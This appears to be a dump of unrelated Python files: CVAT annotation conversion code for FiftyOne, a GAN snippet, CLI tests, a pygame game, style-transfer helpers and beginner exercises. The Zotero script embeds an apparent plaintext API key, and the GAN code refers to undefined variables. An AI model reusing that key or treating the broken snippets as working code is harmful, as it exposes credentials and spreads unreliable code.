Returns:
a :class:`CVATTaskLabels`
"""
labels = []
obj_schemas = schema.objects
for label in sorted(obj_schemas.schema):
obj_schema = obj_schemas.schema[label]
obj_attr_schemas = obj_schema.attrs
attributes = []
for name in sorted(obj_attr_schemas.schema):
attr_schema = obj_attr_schemas.schema[name]
if isinstance(attr_schema, etad.CategoricalAttributeSchema):
attributes.append(
{
"name": name,
"categories": sorted(attr_schema.categories),
}
)
labels.append({"name": label, "attributes": attributes})
return cls(labels=labels)
class CVATImage(object):
"""An annotated image in CVAT image format.
Args:
id: the ID of the image
name: the filename of the image
width: the width of the image, in pixels
height: the height of the image, in pixels
boxes (None): a list of :class:`CVATImageBox` instances
"""
def __init__(self, id, name, width, height, boxes=None):
self.id = id
self.name = name
self.width = width
self.height = height
self.boxes = boxes or []
def get_image_metadata(self):
"""Returns a :class:`fiftyone.core.metadata.ImageMetadata` instance for
the annotations.
Returns:
a :class:`fiftyone.core.metadata.ImageMetadata`
"""
return fom.ImageMetadata(width=self.width, height=self.height)
def to_detections(self):
"""Returns a :class:`fiftyone.core.labels.Detections` representation of
the annotations.
Returns:
a :class:`fiftyone.core.labels.Detections`
"""
frame_size = (self.width, self.height)
detections = [box.to_detection(frame_size) for box in self.boxes]
return fol.Detections(detections=detections)
@classmethod
def from_detections(cls, detections, metadata):
"""Creates a :class:`CVATImage` from a
:class:`fiftyone.core.labels.Detections`.
Args:
detections: a :class:`fiftyone.core.labels.Detections`
metadata: a :class:`fiftyone.core.metadata.ImageMetadata` for the
image
Returns:
a :class:`CVATImage`
"""
width = metadata.width
height = metadata.height
boxes = [
CVATImageBox.from_detection(d, metadata)
for d in detections.detections
]
return cls(None, None, width, height, boxes=boxes)
@classmethod
def from_image_dict(cls, d):
"""Creates a :class:`CVATImage` from an ``<image>`` tag of a CVAT image
annotations XML file.
Args:
d: a dict representation of an ``<image>`` tag
Returns:
a :class:`CVATImage`
"""
id = d["@id"]
name = d["@name"]
width = int(d["@width"])
height = int(d["@height"])
boxes = []
for box in _ensure_list(d.get("box", [])):
boxes.append(CVATImageBox.from_box_dict(box))
return cls(id, name, width, height, boxes=boxes)
class CVATImageBox(object):
"""An object bounding box (with attributes) in CVAT image format.
Args:
label: the object label string
xtl: the top-left x-coordinate of the box, in pixels
ytl: the top-left y-coordinate of the box, in pixels
xbr: the bottom-right x-coordinate of the box, in pixels
ybr: the bottom-right y-coordinate of the box, in pixels
occluded (None): whether the object is occluded
attributes (None): a list of :class:`CVATAttribute` instances
"""
def __init__(
self, label, xtl, ytl, xbr, ybr, occluded=None, attributes=None
):
self.label = label
self.xtl = xtl
self.ytl = ytl
self.xbr = xbr
self.ybr = ybr
self.occluded = occluded
self.attributes = attributes or []
def to_detection(self, frame_size):
"""Returns a :class:`fiftyone.core.labels.Detection` representation of
the box.
Args:
frame_size: the ``(width, height)`` of the image
Returns:
a :class:`fiftyone.core.labels.Detection`
"""
label = self.label
width, height = frame_size
bounding_box = [
self.xtl / width,
self.ytl / height,
(self.xbr - self.xtl) / width,
(self.ybr - self.ytl) / height,
]
attributes = {a.name: a.to_attribute() for a in self.attributes}
if self.occluded is not None:
attributes["occluded"] = fol.BooleanAttribute(value=self.occluded)
return fol.Detection(
label=label, bounding_box=bounding_box, attributes=attributes,
)
@classmethod
def from_detection(cls, detection, metadata):
"""Creates a :class:`CVATImageBox` from a
:class:`fiftyone.core.labels.Detection`.
Args:
detection: a :class:`fiftyone.core.labels.Detection`
metadata: a :class:`fiftyone.core.metadata.ImageMetadata` for the
image
Returns:
a :class:`CVATImageBox`
"""
label = detection.label
width = metadata.width
height = metadata.height
x, y, w, h = detection.bounding_box
xtl = int(round(x * width))
ytl = int(round(y * height))
xbr = int(round((x + w) * width))
ybr = int(round((y + h) * height))
occluded = None
if detection.attributes:
supported_attrs = (
fol.BooleanAttribute,
fol.CategoricalAttribute,
fol.NumericAttribute,
)
attributes = []
for name, attr in detection.attributes.items():
if name == "occluded":
occluded = attr.value
elif isinstance(attr, supported_attrs):
attributes.append(CVATAttribute(name, attr.value))
else:
attributes = None
return cls(
label, xtl, ytl, xbr, ybr, occluded=occluded, attributes=attributes
)
@classmethod
def from_box_dict(cls, d):
"""Creates a :class:`CVATImageBox` from a ``<box>`` tag of a CVAT image
annotation XML file.
Args:
d: a dict representation of a ``<box>`` tag
Returns:
a :class:`CVATImageBox`
"""
label = d["@label"]
xtl = int(round(float(d["@xtl"])))
ytl = int(round(float(d["@ytl"])))
xbr = int(round(float(d["@xbr"])))
ybr = int(round(float(d["@ybr"])))
occluded = d.get("@occluded", None)
if occluded is not None:
occluded = bool(int(occluded))
attributes = []
for attr in _ensure_list(d.get("attribute", [])):
name = attr["@name"].lstrip("@")
value = attr["#text"]
try:
value = float(value)
except:
pass
attributes.append(CVATAttribute(name, value))
return cls(
label, xtl, ytl, xbr, ybr, occluded=occluded, attributes=attributes
)
class CVATTrack(object):
"""An annotated object track in CVAT video format.
Args:
id: the ID of the track
label: the label for the track
width: the width of the video frames, in pixels
height: the height of the video frames, in pixels
boxes (None): a dict mapping frame numbers to :class:`CVATVideoBox`
instances
"""
def __init__(self, id, label, width, height, boxes=None):
self.id = id
self.label = label
self.width = width
self.height = height
self.boxes = boxes or {}
def to_detections(self):
"""Returns a :class:`fiftyone.core.labels.Detection` representation of
the annotations.
Returns:
a dictionary mapping frame numbers to
:class:`fiftyone.core.labels.Detection` instances
"""
frame_size = (self.width, self.height)
detections = {}
for frame_number, box in self.boxes.items():
detection = box.to_detection(frame_size)
detection.index = self.id
detections[frame_number] = detection
return detections
@classmethod
def from_detections(cls, id, detections, frame_size):
"""Creates a :class:`CVATTrack` from a dictionary of
:class:`fiftyone.core.labels.Detection` instances.
Args:
id: the ID of the track
detections: a dict mapping frame numbers to
:class:`fiftyone.core.labels.Detection` instances
frame_size: the ``(width, height)`` of the video frames
Returns:
a :class:`CVATTrack`
"""
width, height = frame_size
boxes = {}
label = None
for frame_number, detection in detections.items():
label = detection.label
boxes[frame_number] = CVATVideoBox.from_detection(
frame_number, detection, frame_size
)
return cls(id, label, width, height, boxes=boxes)
@classmethod
def from_track_dict(cls, d, frame_size):
"""Creates a :class:`CVATTrack` from a ``<track>`` tag of a CVAT video
annotation XML file.
Args:
d: a dict representation of an ``<track>`` tag
frame_size: the ``(width, height)`` of the video frames
Returns:
a :class:`CVATTrack`
"""
id = d["@id"]
label = d["@label"]
width, height = frame_size
boxes = {}
for box_dict in _ensure_list(d.get("box", [])):
box = CVATVideoBox.from_box_dict(label, box_dict)
boxes[box.frame] = box
return cls(id, label, width, height, boxes=boxes)
class CVATVideoBox(object):
"""An object bounding box (with attributes) in CVAT video format.
Args:
frame: the frame number
label: the object label string
xtl: the top-left x-coordinate of the box, in pixels
ytl: the top-left y-coordinate of the box, in pixels
xbr: the bottom-right x-coordinate of the box, in pixels
ybr: the bottom-right y-coordinate of the box, in pixels
outside (None): whether the object is truncated by the frame edge
occluded (None): whether the object is occluded
keyframe (None): whether the frame is a key frame
attributes (None): a list of :class:`CVATAttribute` instances
"""
def __init__(
self,
frame,
label,
xtl,
ytl,
xbr,
ybr,
outside=None,
occluded=None,
keyframe=None,
attributes=None,
):
self.frame = frame
self.label = label
self.xtl = xtl
self.ytl = ytl
self.xbr = xbr
self.ybr = ybr
self.outside = outside
self.occluded = occluded
self.keyframe = keyframe
self.attributes = attributes or []
def to_detection(self, frame_size):
"""Returns a :class:`fiftyone.core.labels.Detection` representation of
the box.
Args:
frame_size: the ``(width, height)`` of the video frames
Returns:
a :class:`fiftyone.core.labels.Detection`
"""
label = self.label
width, height = frame_size
bounding_box = [
self.xtl / width,
self.ytl / height,
(self.xbr - self.xtl) / width,
(self.ybr - self.ytl) / height,
]
attributes = {a.name: a.to_attribute() for a in self.attributes}
if self.outside is not None:
attributes["outside"] = fol.BooleanAttribute(value=self.outside)
if self.occluded is not None:
attributes["occluded"] = fol.BooleanAttribute(value=self.occluded)
if self.keyframe is not None:
attributes["keyframe"] = fol.BooleanAttribute(value=self.keyframe)
return fol.Detection(
label=label, bounding_box=bounding_box, attributes=attributes,
)
@classmethod
def from_detection(cls, frame_number, detection, frame_size):
"""Creates a :class:`CVATVideoBox` from a
:class:`fiftyone.core.labels.Detection`.
Args:
frame_number: the frame number
detection: a :class:`fiftyone.core.labels.Detection`
frame_size: the ``(width, height)`` of the video frames
Returns:
a :class:`CVATVideoBox`
"""
label = detection.label
width, height = frame_size
x, y, w, h = detection.bounding_box
xtl = int(round(x * width))
ytl = int(round(y * height))
xbr = int(round((x + w) * width))
ybr = int(round((y + h) * height))
outside = None
occluded = None
keyframe = None
if detection.attributes:
supported_attrs = (
fol.BooleanAttribute,
fol.CategoricalAttribute,
fol.NumericAttribute,
)
attributes = []
for name, attr in detection.attributes.items():
if name == "outside":
outside = attr.value
elif name == "occluded":
occluded = attr.value
elif name == "keyframe":
keyframe = attr.value
elif isinstance(attr, supported_attrs):
attributes.append(CVATAttribute(name, attr.value))
else:
attributes = None
return cls(
frame_number,
label,
xtl,
ytl,
xbr,
ybr,
outside=outside,
occluded=occluded,
keyframe=keyframe,
attributes=attributes,
)
@classmethod
def from_box_dict(cls, label, d):
"""Creates a :class:`CVATVideoBox` from a ``<box>`` tag of a CVAT video
annotation XML file.
Args:
label: the object label
d: a dict representation of a ``<box>`` tag
Returns:
a :class:`CVATVideoBox`
"""
frame = int(d["@frame"])
xtl = int(round(float(d["@xtl"])))
ytl = int(round(float(d["@ytl"])))
xbr = int(round(float(d["@xbr"])))
ybr = int(round(float(d["@ybr"])))
outside = d.get("@outside", None)
if outside is not None:
outside = bool(int(outside))
occluded = d.get("@occluded", None)
if occluded is not None:
occluded = bool(int(occluded))
keyframe = d.get("@keyframe", None)
if keyframe is not None:
keyframe = bool(int(keyframe))
attributes = []
for attr in _ensure_list(d.get("attribute", [])):
name = attr["@name"].lstrip("@")
value = attr["#text"]
try:
value = float(value)
except:
pass
attributes.append(CVATAttribute(name, value))
return cls(
frame,
label,
xtl,
ytl,
xbr,
ybr,
outside=outside,
occluded=occluded,
keyframe=keyframe,
attributes=attributes,
)
class CVATAttribute(object):
"""An attribute in CVAT image format.
Args:
name: the attribute name
value: the attribute value
"""
def __init__(self, name, value):
self.name = name
self.value = value
def to_eta_attribute(self):
"""Returns an ``eta.core.data.Attribute`` representation of the
attribute.
Returns:
an ``eta.core.data.Attribute``
"""
if isinstance(self.value, bool):
return etad.BooleanAttribute(self.name, self.value)
if etau.is_numeric(self.value):
return etad.NumericAttribute(self.name, self.value)
return etad.CategoricalAttribute(self.name, self.value)
def to_attribute(self):
"""Returns a :class:`fiftyone.core.labels.Attribute` representation of
the attribute.
Returns:
a :class:`fiftyone.core.labels.Attribute`
"""
if isinstance(self.value, bool):
return fol.BooleanAttribute(value=self.value)
if etau.is_numeric(self.value):
return fol.NumericAttribute(value=self.value)
return fol.CategoricalAttribute(value=self.value)
class CVATImageAnnotationWriter(object):
"""Class for writing annotations in CVAT image format.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format
details.
"""
def __init__(self):
environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(foc.RESOURCES_DIR),
trim_blocks=True,
lstrip_blocks=True,
)
self.template = environment.get_template(
"cvat_image_annotation_template.xml"
)
def write(
self, cvat_task_labels, cvat_images, xml_path, id=None, name=None
):
"""Writes the annotations to disk.
Args:
cvat_task_labels: a :class:`CVATTaskLabels` instance
cvat_images: a list of :class:`CVATImage` instances
xml_path: the path to write the annotations XML file
id (None): an ID for the task
name (None): a name for the task
"""
now = datetime.now().isoformat()
xml_str = self.template.render(
{
"id": id if id is not None else "",
"name": name if name is not None else "",
"size": len(cvat_images),
"created": now,
"updated": now,
"labels": cvat_task_labels.labels,
"dumped": now,
"images": cvat_images,
}
)
etau.write_file(xml_str, xml_path)
class CVATVideoAnnotationWriter(object):
"""Class for writing annotations in CVAT video format.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format
details.
"""
def __init__(self):
environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(foc.RESOURCES_DIR),
trim_blocks=True,
lstrip_blocks=True,
)
self.template = environment.get_template(
"cvat_video_interpolation_template.xml"
)
def write(
self,
cvat_task_labels,
cvat_tracks,
metadata,
xml_path,
id=None,
name=None,
):
"""Writes the annotations to disk.
Args:
cvat_task_labels: a :class:`CVATTaskLabels` instance
cvat_tracks: a list of :class:`CVATTrack` instances
metadata: the :class:`fiftyone.core.metadata.VideoMetadata`
instance for the video
xml_path: the path to write the annotations XML file
id (None): an ID for the task
name (None): a name for the task
"""
now = datetime.now().isoformat()
xml_str = self.template.render(
{
"id": id if id is not None else "",
"name": name if name is not None else "",
"size": metadata.total_frame_count,
"created": now,
"updated": now,
"width": metadata.frame_width,
"height": metadata.frame_height,
"labels": cvat_task_labels.labels,
"dumped": now,
"tracks": cvat_tracks,
}
)
etau.write_file(xml_str, xml_path)
def load_cvat_image_annotations(xml_path):
"""Loads the CVAT image annotations from the given XML file.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format
details.
Args:
xml_path: the path to the annotations XML file
Returns:
a tuple of
- info: a dict of dataset info
- cvat_task_labels: a :class:`CVATTaskLabels` instance
- cvat_images: a list of :class:`CVATImage` instances
"""
d = fou.load_xml_as_json_dict(xml_path)
annotations = d.get("annotations", {})
# Verify version
version = annotations.get("version", None)
if version is None:
logger.warning("No version tag found; assuming version 1.1")
elif version != "1.1":
logger.warning(
"Only version 1.1 is explicitly supported; found %s. Trying to "
"load assuming version 1.1 format",
version,
)
# Load meta
meta = annotations.get("meta", {})
# Load task labels
task = meta.get("task", {})
labels_dict = task.get("labels", {})
cvat_task_labels = CVATTaskLabels.from_labels_dict(labels_dict)
# Load annotations
image_dicts = _ensure_list(annotations.get("image", []))
cvat_images = [CVATImage.from_image_dict(id) for id in image_dicts]
# Load dataset info
info = {"task_labels": cvat_task_labels.labels}
if "created" in task:
info["created"] = task["created"]
if "updated" in task:
info["updated"] = task["updated"]
if "dumped" in meta:
info["dumped"] = meta["dumped"]
return info, cvat_task_labels, cvat_images
def load_cvat_video_annotations(xml_path):
"""Loads the CVAT video annotations from the given XML file.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format
details.
Args:
xml_path: the path to the annotations XML file
Returns:
a tuple of
- info: a dict of dataset info
- cvat_task_labels: a :class:`CVATTaskLabels` instance
- cvat_tracks: a list of :class:`CVATTrack` instances
"""
d = fou.load_xml_as_json_dict(xml_path)
annotations = d.get("annotations", {})
# Verify version
version = annotations.get("version", None)
if version is None:
logger.warning("No version tag found; assuming version 1.1")
elif version != "1.1":
logger.warning(
"Only version 1.1 is explicitly supported; found %s. Trying to "
"load assuming version 1.1 format",
version,
)
# Load meta
meta = annotations.get("meta", {})
# Load task labels
task = meta.get("task", {})
labels_dict = task.get("labels", {})
cvat_task_labels = CVATTaskLabels.from_labels_dict(labels_dict)
# Load annotations
track_dicts = _ensure_list(annotations.get("track", []))
if track_dicts:
original_size = task["original_size"]
frame_size = (
int(original_size["width"]),
int(original_size["height"]),
)
cvat_tracks = [
CVATTrack.from_track_dict(td, frame_size) for td in track_dicts
]
else:
cvat_tracks = []
# Load dataset info
info = {"task_labels": cvat_task_labels.labels}
if "created" in task:
info["created"] = task["created"]
if "updated" in task:
info["updated"] = task["updated"]
if "dumped" in meta:
info["dumped"] = meta["dumped"]
return info, cvat_task_labels, cvat_tracks
def _cvat_tracks_to_frames(cvat_tracks, objects_field):
frames = {}
for cvat_track in cvat_tracks:
detections = cvat_track.to_detections()
for frame_number, detection in detections.items():
if frame_number not in frames:
frame = fof.Frame()
frame[objects_field] = fol.Detections()
frames[frame_number] = frame
else:
frame = frames[frame_number]
frame[objects_field].detections.append(detection)
return frames
def _frames_to_cvat_tracks(frames, frame_size):
no_index_map = defaultdict(list)
detections_map = defaultdict(dict)
def process_detection(detection, frame_number):
if detection.index is not None:
detections_map[detection.index][frame_number] = detection
else:
no_index_map[frame_number].append(detection)
# Convert from per-frame to per-object tracks
for frame_number, frame in frames.items():
for _, value in frame.iter_fields():
if isinstance(value, fol.Detection):
process_detection(value, frame_number)
elif isinstance(value, fol.Detections):
for detection in value.detections:
process_detection(detection, frame_number)
cvat_tracks = []
# Generate object tracks
max_index = -1
for index in sorted(detections_map):
max_index = max(index, max_index)
detections = detections_map[index]
cvat_track = CVATTrack.from_detections(index, detections, frame_size)
cvat_tracks.append(cvat_track)
# Generate single tracks for detections with no `index`
index = max_index
for frame_number, detections in no_index_map.items():
for detection in detections:
index += 1
cvat_track = CVATTrack.from_detections(
index, {frame_number: detection}, frame_size
)
cvat_tracks.append(cvat_track)
return cvat_tracks
def _ensure_list(value):
if value is None:
return []
if isinstance(value, list):
return value
return [value]
|
#take user inputs for time period
timePeriod = input("Time Period : ")
timePeriod = float(timePeriod)
#take user inputs for number of times
noOfTimes = input("Number of times : ")
noOfTimes = float(noOfTimes)
#take user inputs for peak time feature
peakTime = input("Peak time (Y /N) : ")
while peakTime != "Y" and peakTime != "y" and peakTime != "N" and peakTime != "n":
print("Invalid Input! Try again!! " + peakTime)
peakTime = input("Peak time (Y /N) : ")
#calculate basic price
if timePeriod > 60:
total = 25000 * noOfTimes
elif timePeriod >= 45:
total = 12000 * noOfTimes
else:
total = 7500 * noOfTimes
#calculate and add extra fee for peak time
if peakTime == "Y" or peakTime == "y":
total = total * 120 / 100
#print output
print("Total amount to be paid : " + str(total))
|
import tensorflow as tf
def discriminator(x):
with tf.variable_scope("discriminator"):
fc1 = tf.layers.dense(inputs=x, units=256, activation=tf.nn.leaky_relu)
fc2 = tf.layers.dense(inputs=fc1, units=256, activation=tf.nn.leaky_relu)
logits = tf.layers.dense(inputs=fc2, units=1)
return logits
def generator(z):
with tf.variable_scope("generator"):
fc1 = tf.layers.dense(inputs=z, units=1024, activation=tf.nn.relu)
fc2 = tf.layers.dense(inputs=fc1, units=1024, activation=tf.nn.relu)
img = tf.layers.dense(inputs=fc2, units=784, activation=tf.nn.tanh)
return img
def gan_loss(logits_real, logits_fake):
# Target label vectors for generator and discriminator losses.
true_labels = tf.ones_like(logits_real)
fake_labels = tf.zeros_like(logits_fake)
# DISCRIMINATOR loss has 2 parts: how well it classifies real images and how well it
# classifies fake images.
real_image_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_real, labels=true_labels)
fake_image_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_fake, labels=fake_labels)
# Combine and average losses over the batch
discriminator_loss = tf.reduce_mean(real_image_loss + fake_image_loss)
# GENERATOR is trying to make the discriminator output 1 for all its images.
# So we use our target label vector of ones for computing generator loss.
generator_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_fake, labels=true_labels)
# Average generator loss over the batch.
generator_loss = tf.reduce_mean(G_loss)
return discriminator_loss , generator_loss
discriminator_solver = tf.train.AdamOptimizer(learning_rate=0.001, beta1=0.5)
generator_solver = tf.train.AdamOptimizer(learning_rate=0.001, beta1=0.5)
z = tf.random_uniform(maxval=1,minval=-1,shape=[batch_size, dim])
generator_sample = generator(z)
with tf.variable_scope("") as scope:
logits_real = discriminator(x)
# Re-use discriminator weights
scope.reuse_variables()
logits_fake = discriminator(generator_sample)
discriminator_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'discriminator')
generator_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'generator')
discriminator_loss, generator_loss = gan_loss(logits_real, logits_fake)
# Training steps
discriminator_train_step = discriminator_solver.minimize(discriminator_loss, var_list=discriminator_vars )
generator_train_step = generator_solver.minimize(generator_loss , var_list=generator_vars )
"""TRAINING LOOP GOES HERE"""
|
import os
from unittest.mock import patch
from click.testing import CliRunner
from mindmeld import cli
from mindmeld.cli import clean, num_parser
def test_num_parse_already_running(mocker):
runner = CliRunner()
with patch("logging.Logger.info") as mocking:
mocker.patch.object(cli, "_get_duckling_pid", return_value=[123])
runner.invoke(num_parser, ["--start"])
mocking.assert_any_call("Numerical parser running, PID %s", 123)
def test_num_parse_not_running(mocker):
runner = CliRunner()
with patch("logging.Logger.warning") as mocking:
mocker.patch.object(cli, "_get_duckling_pid", return_value=None)
mocker.patch.object(cli, "_find_duckling_os_executable", return_value=None)
runner.invoke(num_parser, ["--start"])
mocking.assert_any_call(
"OS is incompatible with duckling executable. Use docker to install duckling."
)
def test_clean_query_cache(mocker, fake_app):
with patch("logging.Logger.info") as mocking:
runner = CliRunner()
mocker.patch.object(os.path, "exists", return_value=False)
runner.invoke(clean, ["--query-cache"], obj={"app": fake_app})
mocking.assert_any_call("Query cache deleted")
def test_clean_model_cache(mocker, fake_app):
with patch("logging.Logger.warning") as mocking:
runner = CliRunner()
mocker.patch.object(os.path, "exists", return_value=True)
mocker.patch.object(os, "listdir", return_value=["123"])
runner.invoke(clean, ["--model-cache"], obj={"app": fake_app})
mocking.assert_any_call(
"Expected timestamped folder. " "Ignoring the file %s.",
"123/.generated/cached_models/123",
)
|
import sys
import pygame
import random
SCREEN = pygame.display.set_mode((640, 480))
class Missile(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.image = pygame.image.load('images/missile/missile.png').convert_alpha()
self.rect = self.image.get_rect()
x, y = SCREEN.get_size()
self.rect.center = (random.randint(0, x), y)
# 델타 y 값 지정
self.dy = random.randint(5, 15)
def update(self):
self.rect.centery = self.rect.centery - self.dy
if self.rect.top < 0:
self.image = pygame.image.load('images/missile/bang.png').convert_alpha()
self.rect.top = 0
class FireMissile:
def __init__(self):
pygame.init()
pygame.display.set_caption("Fire Missile_미사일 발사 게임")
self.background = pygame.Surface(SCREEN.get_size())
self.background.fill(pygame.Color('black'))
SCREEN.blit(self.background, (0, 0))
self.missile_group = pygame.sprite.Group()
for n in range(3):
self.missile_group.add(Missile())
self.clock = pygame.time.Clock()
def render(self):
self.missile_group.clear(SCREEN, self.background)
#화면 지우고 업데이트 > 일반적인 방법
self.missile_group.update()
self.missile_group.draw(SCREEN)
pygame.display.flip()
def fire(self):
fps = 100
# 3개 미사일 추가
# for num in range(3):
# self.missile_group.add(Missile())
keep_going = True
while keep_going:
self.clock.tick(fps)
for event in pygame.event.get():
if event.type == pygame.QUIT:
keep_going = False
# pygame.quit()
# break
for missile in self.missile_group.sprites():
if missile.rect.top == 0:
self.missile_group.remove(missile)
self.missile_group.add(Missile())
self.render()
sys.exit(0)
if __name__ == '__main__':
game = FireMissile()
game.fire()
|
import pymongo
from bson.objectid import ObjectId
from pyzotero import zotero
from getpass import getpass
from sys import argv
if __name__ == '__main__':
#passwd = getpass ("Password: ")
mongo = pymongo.Connection ('localhost', 27017)['refs'] #test
#mongo = pymongo.Connection('localhost', 3002)['meteor']
#mongo.authenticate('skapes', passwd)
library_id= '126319'
library_type='group'
api_key = 'TwxmBGN2hCcTrKePkXPaX9RI'
zot = zotero.Zotero(library_id, library_type, api_key)
items = zot.all_top ()
for item in items:
mongo.references.insert (item)
|
"""
PyTorch implementation of paper "A Neural Algorithm of Artistic Style".
Helper functions.
@author: Zhenye Na
@references:
[1] Leon A. Gatys, Alexander S. Ecker, Matthias Bethge
A Neural Algorithm of Artistic Style. arXiv:1508.06576
"""
import os
import torch
import torch.nn as nn
from PIL import Image
import torchvision.transforms as transforms
# desired size of the output image
imsize = 512 if torch.cuda.is_available() else 128 # use small size if no gpu
loader = transforms.Compose([
transforms.Resize(imsize),
transforms.ToTensor()
])
# reconvert into PIL image
unloader = transforms.ToPILImage()
def image_loader(image_name):
"""Image loader."""
image = Image.open(image_name)
# fake batch dimension required to fit network's input dimensions
image = loader(image).unsqueeze(0)
return image
def save_image(tensor, path):
"""Save a single image."""
image = tensor.cpu().clone()
image = image.squeeze(0)
image = unloader(image)
image.save(os.path.join(path, "out.jpg"))
# create a module to normalize input image so we can easily put it in a
# nn.Sequential
class Normalization(nn.Module):
"""Normalize input image."""
def __init__(self, mean, std):
"""Initialization."""
super(Normalization, self).__init__()
# .view the mean and std to make them [C x 1 x 1] so that they can
# directly work with image Tensor of shape [B x C x H x W].
# B is batch size. C is number of channels. H is height and W is width.
self.mean = torch.tensor(mean).view(-1, 1, 1)
self.std = torch.tensor(std).view(-1, 1, 1)
def forward(self, img):
"""Forward pass."""
return (img - self.mean) / self.std
|
##******** 1- QUICK PYTHON EXERCISES FOR DATA SCIENCE / PART 1 ##*********
#1 What is virtual environment ?
# In short [*] : Creating a virtual environment to isolate projects with different needs.
# Different versions of libraries, packages or modules can be kept.
# They can work without affecting each other.
# 1.1 FORMAL DEFINITION :
'''The venv module provides support for creating lightweight “virtual environments” with
their own site directories, optionally isolated from system site directories.
Each virtual environment has its own Python binary (which matches the version of the binary that
was used to create this environment) and can have its own independent set of installed Python packages in
its site directories.[1]'''
#2 What is Conda ?
# In short it is a tool for creating Virtual Environment and manage it. You can also make dependency management
# 2.1 FORMAL DEFINITION :
''' Package, dependency and environment management for any language—Python, R, Ruby, Lua, Scala, Java,
JavaScript, C/ C++, FORTRAN, and more.
Conda is an open source package management system and environment management system that runs
on Windows, macOS and Linux.
Conda quickly installs, runs and updates packages and their dependencies.
Conda easily creates, saves, loads and switches between environments on your local computer.
It was created for Python programs, but it can package and distribute software for any language. [2]'''
#3 What is Dependency Management ?
# In short it is as it's name Dependency and Package management.
# (Package like Numpy, Pandas etc... ) so that is, the management of these and the tools
# that manage the dependencies of these packages.
# 3.1 FORMAL DEFINITION :
''' Conda as a package manager helps you find and install packages.
If you need a package that requires a different version of Python, you do not need to switch to
a different environment manager, because conda is also an environment manager.
With just a few commands, you can set up a totally separate environment to run that different version of
Python, while continuing to run your usual version of Python in your normal environment. [3] '''
#4 Use string format and print the personnel "no & name"
personnel = {"name": "John", "no": 63323}
"name : {} , no : {}".format(personnel["name"],personnel["no"])
#5 Print the "name" and "no" with fstring.
name = "Connor"
no = 63324
f"Name: {name} , No: {no}"
#6 Please divide the sentence below with the split()
sentence=" Hello Data Science World "
sentence.split()
#7 Please remove the "H" letters and spaces in the sentences below by using strip() with two separate operations.
sentence=" Hello Data Science World "
sentence.strip()
sentence2="Hello Data Science WorldH".strip("H")
sentence2.strip("H")
#8 Take a number from the user by input function. Assign the number to the no variable. Multiple by 8 and
#divede by 2
no= int(input())
no*8/2
#9 Create an employee list. Use dir() to see the possible processes that you can do . Use append() to add
# employee name "Ulas" to the list and then apply pop() method to remove the third element.
employees = ["John","Connor","Sarah","Arnold"]
dir("John")
employees.append("Ulas")
employees
employees.pop(3)
employees
#10 Create a tuple with 6 element and print the first 5 of it.
my_tuple=(1,2,"3",4,'5',6)
my_tuple[:5]
#11 WHAT IS ENUMERATE ?
# In short [*] : Enumeric automatically generates an index, ie counter, in a loop.
# Thus, the elements of a list or any object to be visited in it are automatically indexed.
# This is a life saver to match, track and transact on it.
# 11.1 FORMAL DEFINITION :
"""In computer programming, an enumerated type
(also called enumeration, enum, or factor in the R programming language,
and a categorical variable in statistics)
is a data type consisting of a set of named values called elements,
members, enumeral, or enumerators of the type.[4]"""
# 11.2 ADDITIONAL DEFINITIONS AND USAGE :
#
#
# The enumerate() method creates a counter that tracks how many iterations have occurred in a loop.
# enumerate() is built-in to Python, so we do not have to import any libraries to use
# the enumerate() method [5]
#
# The enumerate() function takes a collection (e.g. a tuple) and returns it as an enumerate object.
# The enumerate() function adds a counter as the key of the enumerate object.[6]
#12 Write a program with enumerate that gives the output below from the list
employee = ["Ulas", "John", "Connor", "Sarah"]
'''REQUIRED OUTPUT :
0 Ulas
1 John
2 Connor
3 Sarah
'''
for index,name in enumerate(employee):
print(index,name)
#13 Write a program with enumerate that gives the output below from the list.
'''REQUIRED OUTPUT :
1 Ulas
2 John
3 Connor
4 Sarah'''
employee = ["Ulas", "John", "Connor", "Sarah"]
for index, name in enumerate(employee,1):
print(index, name)
#14 Create 2 groups from employee list. If index is even assign it to the group X otherwise group Y.
# Use enumeration
X=[]
Y=[]
for index, name in enumerate(employee,1):
if index%2 == 0:
X.append(name)
else:
Y.append(name)
#15 Create a functional solution for question 14
def employeeGroups (employee):
empGroups=[[],[]]
for index, name in enumerate(employee, 1):
if index % 2 == 0:
empGroups[0].append(name)
else:
empGroups[1].append(name)
print(empGroups)
employeeGroups(employee)
#16 Write a modifier function which takes a sentence as an argument . If index is even turn it to lower case
# otherwise to upper case.
def modifier(string):
modSentence= ""
for i in range(len(string)):
if i%2==0:
modSentence+=string[i].lower()
else:
modSentence+=string[i].upper()
print(modSentence)
modifier("Hello World")
#17 What is Map Function for ?
# In short: Map means to matching. It provides the possibility to apply
# a certain function to each element of an iterative object without writing a loop.
# 17.1 FORMAL DEFINITION :
''' Make an iterator that computes the function using arguments from
each of the iterables. Stops when the shortest iterable is exhausted.[7] '''
# 17.2 ADDITIONAL DEFINITIONS AND USAGE :
#
#
# map(function, iterable, ...)
# Apply function to every item of iterable and return a list of the results.
# If additional iterable arguments are passed, function must take that many arguments
# and is applied to the items from all iterables in parallel.[8]
#18 Please write a new_prices function which modifies the prices by additional 30 % .
# Then map this function into the list.
prices = [10000, 20000, 30000, 40000, 50000]
def new_prices(p):
return p*30/100 + p
list(map(new_prices,prices))
#19 For question 8 now apply lambda with map function. Don't write a new_prices function .
# Just write it's features #with lambda function.
list(map(lambda x: x+x*30/100,prices))
#20 Please filter the num_list's even numbers with lambda in Filter() function.
num_list = [0,1,11, 22, 33, 44, 55, 66, 77, 88, 99, 100]
list(filter(lambda x: x%2==0,num_list))
#21 We would like to make summation in the num_list numbers with Reduce fuction.
# Please write the necescary code.
from functools import reduce
reduce(lambda x,y: x+y,num_list)
# 21.1 : Please explain what Reduce () function.
# In short Reduce() function just makes reduction.
# FORMAL DEFINITION :
"""
def reduce(function, sequence, initial=_initial_missing):
